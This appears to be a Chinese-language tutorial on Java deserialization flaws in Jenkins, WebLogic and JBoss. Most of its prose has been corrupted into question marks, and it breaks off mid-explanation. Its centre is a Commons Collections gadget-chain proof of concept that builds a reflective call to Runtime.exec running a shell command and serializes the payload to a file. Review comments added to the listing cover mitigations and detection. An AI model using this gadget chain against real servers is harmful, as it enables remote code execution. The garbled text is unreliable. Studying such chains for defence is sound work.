????Java?????л????????????????2??????????а?????????jenkins??weblogic??jboss????????????ù???????????Java?????л??????????????????Java?????л???Poc????????????
????Java?????л???????
????· Java???л??????????????????????????????楨???????????У?Java?е?ObjectOutputStream???writeObject()??????????????л???
????· Java?????л????????????????????????ObjectInputStream???readObject()????????????л???
????????????Java?????л?????????????з????л?????????????????л?????????????????????????????????
????Java?????л?Poc???
/**
 * Demonstration listing from the article: it assembles a chain of Commons
 * Collections {@code Transformer} objects, attaches the chain to a decorated map,
 * stores that map inside an instance of a JDK-internal handler class, and writes
 * the resulting object graph to {@code temp.bin} with {@code writeObject()}.
 *
 * <p>The listing only produces the serialized file; nothing in it calls
 * {@code readObject()}.
 *
 * <p>NOTE(review): the {@code ??} sequences throughout are extraction residue,
 * most likely the separators that originally stood between arguments. They are
 * left exactly as found, so the listing does not compile as shown.
 *
 * <p>NOTE(review), defensive reading: the exposure is on the reading side, in any
 * code path that calls {@code ObjectInputStream.readObject()} on bytes it does not
 * control while these functor classes are on the classpath. Mitigations to check
 * for: no native deserialization of untrusted input, an allow-list
 * {@code java.io.ObjectInputFilter} on every stream that must remain, and a
 * Commons Collections release that refuses to deserialize its functor classes by
 * default. For detection, Java serialized streams begin with the bytes
 * {@code AC ED 00 05}.
 */
public class test {
public static void main(String[] args) throws Exception {
// Command line the chain is built around: sh -c with `whoami` redirected to a file under /tmp.
String[] execArgs = new String[] { "sh"?? "-c"?? "whoami > /tmp/fuck" };
// Ordered steps; once wrapped in ChainedTransformer (below) each step receives the previous
// step's result. Read together they are the reflective form of
// Runtime.getRuntime().exec(execArgs), expressed as data objects rather than direct calls.
Transformer[] transformers = new Transformer[] {
// Step 1: ignore the input and yield the Runtime class object.
new ConstantTransformer(Runtime.class)??
// Step 2: call getMethod("getRuntime", no parameter types) on that class object.
new InvokerTransformer(
"getMethod"??
new Class[] {String.class?? Class[].class }??
new Object[] {"getRuntime"?? new Class[0] }
)??
// Step 3: call invoke(null, null) on the Method from step 2 (static call, no arguments).
new InvokerTransformer(
"invoke"??
new Class[] {Object.class??
Object[].class }?? new Object[] {null?? null }
)??
// Step 4: call exec(String[]) on the object returned by step 3, passing execArgs.
new InvokerTransformer(
"exec"??
new Class[] {String[].class }??
new Object[] { execArgs }
)
};
Transformer transformedChain = new ChainedTransformer(transformers);
// Plain map with one entry; it is the backing map for the decorator below.
Map<String?? String> BeforeTransformerMap = new HashMap<String?? String>();
BeforeTransformerMap.put("hello"?? "manning");
// Decorate the map: no key transformer (null), the chain installed as the value transformer.
Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap?? null?? transformedChain);
// The handler class is JDK-internal, so it is looked up by name and its declared
// (Class, Map) constructor is made accessible through reflection before use.
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class?? Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class?? AfterTransformerMap);
// Serialize the handler instance (and the map and chain it references) to temp.bin
// in the current working directory.
File f = new File("temp.bin");
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
}
}
???????????????????poc?????????Java?е??Щ???
??????Apache commons????????к??jar??(jar??????????python???)??????jar?????溬?е????????????????

????????Java?????л??????????org.apache.commons.collections????????檔org.apache.commons.collections???????????????????????Java??collection??????????Щ????????collection??????????????????????Java?е?collection??????????????collection??????????collection??????????collection?set??list??queue???????????????collection??set??list??queue?????collection?????????????????????????????巽???????set??list??queue???
??????org.apache.commons.collections???????????????Transformer????????????????
Defines a functor interface implemented by classes that transform one object into another.
?????????????Transformer????????????????????????????????????????????Transformer???????????????



????????????Java?????л??????poc???е???

????· ConstantTransformer
????Transformer implementation that returns the same constant each time. (?????????????????????????)
????· InvokerTransformer
????Transformer implementation that creates a new object instance by reflection. (??????????????????)
????· ChainedTransformer
????Transformer implementation that chains the specified transformers together. (???Щtransformer????????????????????????????????????????????????transformer???????)
?????????????????????????????poc???poc???棬????????????????1??????
????· execArgs
????????е?????????
????· transformers
???????transformer?????????????????(????transformer????)?????????
????· transformedChain
????ChainedTransformer?????????transformers???飬???????transformers??????????????????
????· BeforeTransformerMap
????Map?????????????Map??Map???????????????????????????python??dict?????
????· AfterTransformerMap